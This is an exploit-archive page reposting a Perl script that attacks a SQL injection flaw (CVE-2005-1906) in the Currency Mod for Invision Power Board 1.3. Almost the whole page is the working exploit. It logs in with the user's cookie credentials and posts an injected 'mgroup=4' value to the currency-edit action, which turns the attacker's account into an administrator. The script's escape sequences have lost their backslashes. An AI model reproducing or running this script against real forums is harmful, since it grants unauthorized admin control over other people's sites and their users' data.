Advertisement






Invision Power Board 1.3 Currency Mod(edit) SQL injection

CVE Category Price Severity
CVE-2005-1906 CWE-89 $100 - $300 High
Author Risk Exploitation Type Date
NitroSecurity High Remote 2010-03-16
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010030053

Below is a copy:

# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: www.invisionpower.com<http://www.invisionpower.com>
# Version: 1.3
# Tested on: 1.3
# CVE:
# Code:
#!/usr/bin/perl
#########################################################################
#    Invision Power Board Currency Mod(edit) SQL injection.             #
#    Bug found by Pr0T3cT10n, [email protected]<mailto:[email protected]>                      #
#    The exploit is updating your user to an admin account              #
#        **YOU SHOULD HAVE CURRENCY EDIT ACCESS!**                      #
#########################################################################
use IO::Socket;
use Digest::MD5 qw(md5_hex);

$host    = $ARGV[0];
$path    = $ARGV[1];
$id        = $ARGV[2];
$passwd    = $ARGV[3];

if(!$ARGV[3])
{
print "#################################################n";
print "##   IPB Currency Mod SQL injection Exploit.   ##n";
print "##          Discoverd By Pr0T3cT10n.           ##n";
print "#################################################n";
print "$0 [host] [path] [your id] [your passowrd]n";
print "$0 host.com /forum 567 123456n";
print "#################################################n";
exit();
}
print "[~] Connecting $host:80...n";
$socket = IO::Socket::INET->new(
                                Proto => "tcp" ,
                                PeerAddr => $host ,
                                PeerPort => "80") or die("[-] Connection faild.n");
print "[+] Connected.n[~] Sending POST information...n";
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1rn";
$pack.= "Host: " . $host . "rn";
$pack.= "User-Agent: No_Agentrn";
$pack.= "Accept: */*rn";
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "rn";
$pack.= "Keep-Alive: 300rn";
$pack.= "Connection: keep-alivern";
$pack.= "Content-Type: application/x-www-form-urlencodedrn";
$pack.= "Content-Length: 24rnrn";
$pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'

print $socket $pack;

while($res = <$socket>)
    {
    if($res =~ /<table align='center' cellpadding="4" class="tablefill">/)
        {
        print("[+] succeed.n");
        exit();
        }
    }
print("[-] Faild.n");
exit();

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum